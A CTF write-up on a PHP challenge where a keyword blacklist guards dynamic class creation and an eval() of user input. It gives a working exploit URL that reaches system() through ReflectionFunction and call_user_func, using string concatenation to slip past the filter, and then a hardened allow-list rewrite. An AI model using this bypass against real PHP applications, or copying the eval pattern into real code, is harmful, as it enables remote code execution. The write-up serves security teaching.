NepNepCTF2021 WEB2

  • This was an unintended solve at the time. A brief note on RCE via PHP reflection.

The core code of the challenge is as follows:

<?php
highlight_file(__FILE__);
// Blacklist filter: case-insensitive keyword replacement on the raw input string.
function waf($s) {
  return preg_replace('/sys|exec|sh|flag|pass|file|open|dir|2333|;|#|\/\/|>/i', "NepnEpneP", $s);
}
// Sink 1: user-controlled class name and constructor argument.
if(isset($_GET['a'])) {
  $_ = waf($_GET['a']);
  $__ = waf($_GET['b']);
  $a = new $_($__);
} else {
  $a = new Error('?');
}
// Sink 2: user-controlled method name and argument list passed to eval().
if(isset($_GET['c']) && isset($_GET['d'])) {
  $c = waf($_GET['c']);
  $d = waf($_GET['d']);
  eval("\$a->$c($d);");
} else {
  $c = "getMessage";
  $d = "";
  eval("echo \$a->$c($d);");
}
?>
  • A small modification of the demo in the PHP Reflection documentation is enough to call an arbitrary function:
<?php
$function = new ReflectionFunction('system');
echo $function->invoke("whoami");
?>
  • But the challenge filters keywords such as sys, so we take a different route: invokeArgs together with call_user_func, building the function name by string concatenation, which bypasses the filter and executes arbitrary code. The filter only sees the source text 's'.'y'.'s'.'tem', never the runtime value system. For example:
<?php
$function = new ReflectionFunction('call_user_func');
echo $function->invokeArgs(array('s'.'y'.'s'.'tem','whoami'));
?>

  • EXP
index.php?a=ReflectionFunction&b=call_user_func&c=invokeArgs&d=array(%27s%27.%27y%27.%27s%27.%27tem%27,%27cat%20/f%27.%27lag%27)
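The root cause in the challenge code is that a keyword blacklist is applied to the source text of the input while the dangerous operations (dynamic `new`, `eval()`) act on the runtime value, so any encoding of the name that the regex does not match (concatenation, as above) gets through. The following is an added example, not the challenge's or the author's code: a hardened rewrite of the same handler that replaces the blacklist with allow-lists of class and method names, drops the user-controlled argument list entirely, and never passes user input to `eval()`. The allow-list contents are constructed for this example; an application would fill them with the handful of classes and methods it actually needs.

```php
<?php
// Added example (not part of the original writeup): hardened handler.
// Allow-lists are constructed for this example and stand in for whatever
// the application genuinely needs to expose.
declare(strict_types=1);

const ALLOWED_CLASSES = ['Error', 'Exception'];          // no Reflection*, no callback-taking classes
const ALLOWED_METHODS = ['getMessage', 'getCode'];       // zero-argument getters only

// Instantiate only an allow-listed class; the check is an exact, case-sensitive
// match on the runtime value, so there is no "encoding" of the name to bypass.
function safe_new(string $class, string $arg): object {
    if (!in_array($class, ALLOWED_CLASSES, true)) {
        throw new InvalidArgumentException('class not allowed');
    }
    return new $class($arg);
}

// Call only an allow-listed method, directly, with no user-supplied argument
// string: the eval("\$a->$c($d);") sink from the challenge no longer exists.
function safe_call(object $obj, string $method): string {
    if (!in_array($method, ALLOWED_METHODS, true)) {
        throw new InvalidArgumentException('method not allowed');
    }
    return (string) $obj->$method();
}

// Same request parameters as the challenge, minus 'd' (no argument list).
$class  = $_GET['a'] ?? 'Error';
$arg    = $_GET['b'] ?? '?';
$method = $_GET['c'] ?? 'getMessage';

try {
    $a = safe_new($class, $arg);
    // Output-encode, since the constructor argument is attacker-controlled text.
    echo htmlspecialchars(safe_call($a, $method), ENT_QUOTES, 'UTF-8');
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    echo 'rejected';
}
?>
```

With this version the writeup's payload (`a=ReflectionFunction&c=invokeArgs&d=...`) is rejected at `safe_new` before any object is created, and there is no `d` parameter or `eval()` left to reach. The general point: validate the runtime value against an exact allow-list at the point of use, rather than pattern-matching the raw input for "bad words".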